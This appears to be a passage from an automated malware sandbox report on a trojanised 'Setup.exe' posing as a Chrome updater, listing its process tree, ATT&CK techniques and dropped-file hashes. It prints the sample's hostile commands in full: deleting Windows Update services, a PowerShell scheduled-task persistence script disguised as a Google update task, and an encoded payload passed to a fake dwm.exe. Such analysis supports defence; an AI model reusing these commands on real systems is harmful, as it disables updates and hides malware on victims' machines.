C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:5876
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5008
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1432
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:1308
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  2⤵
  PID:1208
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:5704
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:1532
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2044
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  2⤵
  PID:220
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  2⤵
  PID:956
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:4736

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5336
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:1504
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:4596
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:4904
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ujotz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:3356

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe xyfwlnkork
1⤵
PID:6092
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:4380

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
PID:5888
- C:\Windows\System32\Wbem\WMIC.exe
  wmic PATH Win32_VideoController GET Name, VideoProcessor
  2⤵
  PID:5576

C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe dvfkcwhearldixfx 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
1⤵
PID:5920

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
69.9MB

MD5
efaa9972b14c4c80ec88680e7c7b78d4

SHA1
4a81446ac874f90858d0b5627537f85f0d7d15b4

SHA256
c98577fad86db5c5f791b97428045ed0fdf27c792fa5f7ea50e12f29fef3e5ea

SHA512
c13ba77f8a71a7b896570ad239976841076e9f21a81829991a0498a2436d025b8867e09c82399ac0f4988ccabedf146f09987b51bc315ebc7e6368b0b15e75a4

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
69.9MB

MD5
efaa9972b14c4c80ec88680e7c7b78d4

SHA1
4a81446ac874f90858d0b5627537f85f0d7d15b4

SHA256
c98577fad86db5c5f791b97428045ed0fdf27c792fa5f7ea50e12f29fef3e5ea

SHA512
c13ba77f8a71a7b896570ad239976841076e9f21a81829991a0498a2436d025b8867e09c82399ac0f4988ccabedf146f09987b51bc315ebc7e6368b0b15e75a4

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
462f3c1360a4b5e319363930bc4806f6

SHA1
9ba5e43d833c284b89519423f6b6dab5a859a8d0

SHA256
fec64069c72a8d223ed89a816501b3950f5e4f5dd88f289a923c5f961d259f85

SHA512
5584ef75dfb8a1907c071a194fa78f56d10d1555948dffb8afcacaaa2645fd9d842a923437d0e94fad1d1919dcef5b25bf065863405c8d2a28216df27c87a417

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d2642245b1e4572ba7d7cd13a0675bb8

SHA1
96456510884685146d3fa2e19202fd2035d64833

SHA256
3763676934b31fe2e3078256adb25b01fdf899db6616b6b41dff3062b68e20a1

SHA512
99e35f5eefc1e654ecfcf0493ccc02475ca679d3527293f35c3adea66879e21575ab037bec77775915ec42ac53e30416c3928bc3c57910ce02f3addd880392e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3a52e5da09c9208c929e1ada6f110b66

SHA1
164ca4082323a643fe91a829fe20a0dc6ba959bb

SHA256
270761087524e58a55c60ca81f8ab117f47c7d4b6a6c6c3b821033078e8af58a

SHA512
eb7dadb7097758dcdb7826d7921b1177a472f4a341b9112c031dcc42b430b85e68b2e41e7619a1c74ac240dcee97a5a8f632401ef1207af88e56fc09c0b604e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
1654a6075ef34d1decd26bca81ad312d

SHA1
b5ee3e7c516c3f2370c812c3002f645ee89f2ed9

SHA256
ce482c808f33816a3897d3279dd7cbff9e79ed2a9c026cde85fe945a3a9cceb5

SHA512
3de2be1f8be92d76bbe404d68bde9b9ecea6e8606e49a085eabbab8410d5773535eca9ac2c9b4e3480097776b8ae7bfcc9962da1febe1cf3407daa6c48ef1414

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
696B

MD5
5968c92820b60a7638c9c4a8cee678a5

SHA1
0cb9feb2c8ea0523706978ba9c29609aab0fb8d9

SHA256
b6b95700220f8122b1280f614bf980fa2b5853aadef9eb682392478b94d58818

SHA512
bd53fa3f2eaa1da27e5a493f855342c9798e90ce96ddf779173c6372de5fd83b1a0e6434e096ecf7f93c118120507051dc84c6fae853630a1836f64cd4344920

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk

Filesize
2KB

MD5
121f0cb127af78004664fab2bc032c36

SHA1
1aafbe3eefbf71b38570f66e3a50828f6d63139b

SHA256
bf3e6e4a71307e0a0c1b967ff4cfb97997e54465d6fae0c12eeaa7ef6dc5bf8b

SHA512
289b2315b5ba02a9e6b85b4992cb1b5a359711ac85f3b0c9d0e9699b1bbb38ebf9f1dcd3a3b2f79d76b77074d1ba042136d819ee824efdb3bd4c17be759e2c09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
520fcd073d581c3004c82201b916627b

SHA1
eed5385264eaca24e9e7f2db6ffb62151255b2cf

SHA256
702a085f9ca1701b8fcb88e4030a80480ce4a162d61dc8f4de81b7dee34a6658

SHA512
9a15061207dc902006c5a68202f23115cb29ec4c344078043661267bbeb0a8123dc02edb90ed15a1a8a102c74abd61145e7369113888dd985e65cb842835119a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
e256d6218d351393fbce924786b3e9e7

SHA1
4a23d313603d700189f2e895dbda56f6d8d862e4

SHA256
9fc385df00bde02f036293839ca7da35555f9c86e924c455454062d2decd03a2

SHA512
ac4b1bb808e2692589103c423730c3d96262430ede8e757b61b40a0c3db81f9cfc18142ad442f991980a558720788147204dede3a54bfc2662adac4156d0e527

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
aee8d741095b3811d006683ed1aaac23

SHA1
6ee3f69c6ba6677e218e947c7dd06e2d1bfa3de4

SHA256
24458021028128a29c1e7672d2304222a12a4e78a259386c8720fed6539a8bce

SHA512
8b2d997518e13144c4160056e0592a2dfdab32a3bec9f2194cec3096a3ef5822790009465875cd5107d4fc2a721f7e9db8072da79be51fc150cb335b5430a029

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
ff6c2666ece78946a3a95ba6e8d843bd

SHA1
37910be16af5b8b0f99e1069ebc5be2fe1497884

SHA256
54a1c83fa2be90455b3bb75a6b137d97fd7aa8c6c0980785c3a91506fc27887f

SHA512
b8cd09bb6c2c656a78ede2bcbffd4755d39b8ae9cb4f2dddded7c20ab3c6231b18fee2537b439b2e4730f323f6287afc9e7ad6a8b1d1caad1033ddbfe2e68cbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
130644a5f79b27202a13879460f2c31a

SHA1
29e213847a017531e849139c7449bce6b39cb2fa

SHA256
1306a93179e1eaf354d9daa6043ae8ffb37b76a1d1396e7b8df671485582bcd1

SHA512
fbc8606bf988cf0a6dea28c16d4394c9b1e47f6b68256132b5c85caf1ec7b516c0e3d33034db275adf267d5a84af2854f50bd38a9ed5e86eb392144c63252e01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
9KB

MD5
5f052811d5b6adaa3fa58fb7137c8fa5

SHA1
2adf0446700311280214e063e02c63b3616f2d7d

SHA256
4b1544ecda3b7c265fb590e0fa2cb4d16091697437a751de95e7d2a728bbac28

SHA512
6aa95017140b4845fe15f83863b25ff699c94933feaa2186d753ef2c541e62b2200b33c05c0b9a4b57fb4442626d9fcf006f2f25094e7f22449df7345149afdf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
c25f29960514b4c1fb031df4178ef5ed

SHA1
af1aa7ea53e829c368949c5b56b2a8d70d451b3d

SHA256
7dc0a41eb717cce7ea11377ec1d0d755839f213fd400b14d756141d69705b602

SHA512
337c45500ba3417fe860c4cf5eeb540802b71a02a9d9d385d687dd3af65a69a46a976f789466b05224d5f3985df57a59a54eab45d7b0ea00ee1980f7feabb353

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
feadc4e1a70c13480ef147aca0c47bc0

SHA1
d7a5084c93842a290b24dacec0cd3904c2266819

SHA256
5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac

SHA512
c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2f544862b244d0801f82f5fa20013f20

SHA1
39e3dcf4e849bb1a39b67b9fc2d2f597ff6a3b8a

SHA256
780f0fda3df0c4a4b3ca79177ecf0741de262f10abc9c15e923b7a2b0624dbc2

SHA512
a4ab31a57ac1b773766e50decdc16e1db4de1ad9f9e7854a0e8ec86fb59b9e53d3a83e2e3b7ae137256b4ae9411018044dc2de1471ea6b74adfd778e6826ab52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2f544862b244d0801f82f5fa20013f20

SHA1
39e3dcf4e849bb1a39b67b9fc2d2f597ff6a3b8a

SHA256
780f0fda3df0c4a4b3ca79177ecf0741de262f10abc9c15e923b7a2b0624dbc2

SHA512
a4ab31a57ac1b773766e50decdc16e1db4de1ad9f9e7854a0e8ec86fb59b9e53d3a83e2e3b7ae137256b4ae9411018044dc2de1471ea6b74adfd778e6826ab52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08f9f3eb63ff567d1ee2a25e9bbf18f0

SHA1
6bf06056d1bb14c183490caf950e29ac9d73643a

SHA256
82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

SHA512
425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yc10wdrs.o4x.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
da82540358c0ee1162307ebe9b6fbd21

SHA1
e887127e179aac99222cf11ad3f19b05168935a7

SHA256
91ce4e5323687c77975210045c498c26098e8208aa97e89abb4ee8e22f96ba66

SHA512
4710ca870ab37fa44b4a154583b7407b7a2bc5a5b89c6163c4b230a03dd4a0df8e47df10f2fe1856110669e0608086529607e39ccc9af7e3407ce9d4d8e1e849

Download Submit
C:\Users\Admin\Downloads\Goofeys files.rar

Filesize
2.0MB

MD5
4ac67f816dee9a812d3bdbc55f443ff2

SHA1
3b2f42cdf48ea3d73cce372b22a74f2046f8aba3

SHA256
82645929235c89a0414e49ae78c78d7d66e382ea6efc147cdfd4206b81717e3b

SHA512
0fa2ae1ffccb3100091525e68feb487f0720474af73a032ba256a5ccafcd90d764dc94590d232f721144f55e96989966239cdbd4fe59e4a136c2c673d8d1bc8d

Download Submit
C:\Users\Admin\Downloads\Goofeys files.rar

Filesize
2.0MB

MD5
4ac67f816dee9a812d3bdbc55f443ff2

SHA1
3b2f42cdf48ea3d73cce372b22a74f2046f8aba3

SHA256
82645929235c89a0414e49ae78c78d7d66e382ea6efc147cdfd4206b81717e3b

SHA512
0fa2ae1ffccb3100091525e68feb487f0720474af73a032ba256a5ccafcd90d764dc94590d232f721144f55e96989966239cdbd4fe59e4a136c2c673d8d1bc8d

Download Submit
C:\Users\Admin\Downloads\Goofeys files\Setup.exe

Filesize
69.9MB

MD5
efaa9972b14c4c80ec88680e7c7b78d4

SHA1
4a81446ac874f90858d0b5627537f85f0d7d15b4

SHA256
c98577fad86db5c5f791b97428045ed0fdf27c792fa5f7ea50e12f29fef3e5ea

SHA512
c13ba77f8a71a7b896570ad239976841076e9f21a81829991a0498a2436d025b8867e09c82399ac0f4988ccabedf146f09987b51bc315ebc7e6368b0b15e75a4

Download Submit
C:\Users\Admin\Downloads\Goofeys files\Setup.exe

Filesize
69.9MB

MD5
efaa9972b14c4c80ec88680e7c7b78d4

SHA1
4a81446ac874f90858d0b5627537f85f0d7d15b4

SHA256
c98577fad86db5c5f791b97428045ed0fdf27c792fa5f7ea50e12f29fef3e5ea

SHA512
c13ba77f8a71a7b896570ad239976841076e9f21a81829991a0498a2436d025b8867e09c82399ac0f4988ccabedf146f09987b51bc315ebc7e6368b0b15e75a4

Download Submit
C:\Users\Admin\Downloads\Goofeys files\Setup.exe

Filesize
69.9MB

MD5
efaa9972b14c4c80ec88680e7c7b78d4

SHA1
4a81446ac874f90858d0b5627537f85f0d7d15b4

SHA256
c98577fad86db5c5f791b97428045ed0fdf27c792fa5f7ea50e12f29fef3e5ea

SHA512
c13ba77f8a71a7b896570ad239976841076e9f21a81829991a0498a2436d025b8867e09c82399ac0f4988ccabedf146f09987b51bc315ebc7e6368b0b15e75a4

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
\??\c:\program files\google\chrome\updater.exe

Filesize
69.9MB

MD5
efaa9972b14c4c80ec88680e7c7b78d4

SHA1
4a81446ac874f90858d0b5627537f85f0d7d15b4

SHA256
c98577fad86db5c5f791b97428045ed0fdf27c792fa5f7ea50e12f29fef3e5ea

SHA512
c13ba77f8a71a7b896570ad239976841076e9f21a81829991a0498a2436d025b8867e09c82399ac0f4988ccabedf146f09987b51bc315ebc7e6368b0b15e75a4

Download Submit
memory/1516-163-0x00007FFB28EA0000-0x00007FFB28EA1000-memory.dmp

Filesize
4KB

Download
memory/1532-144-0x000002A43C170000-0x000002A43C180000-memory.dmp

Filesize
64KB

Download
memory/1532-145-0x000002A43C170000-0x000002A43C180000-memory.dmp

Filesize
64KB

Download
memory/1532-143-0x000002A43C170000-0x000002A43C180000-memory.dmp

Filesize
64KB

Download
memory/1532-133-0x000002A455CF0000-0x000002A455D12000-memory.dmp

Filesize
136KB

Download
memory/2228-644-0x0000028D7FD60000-0x0000028D7FD7A000-memory.dmp

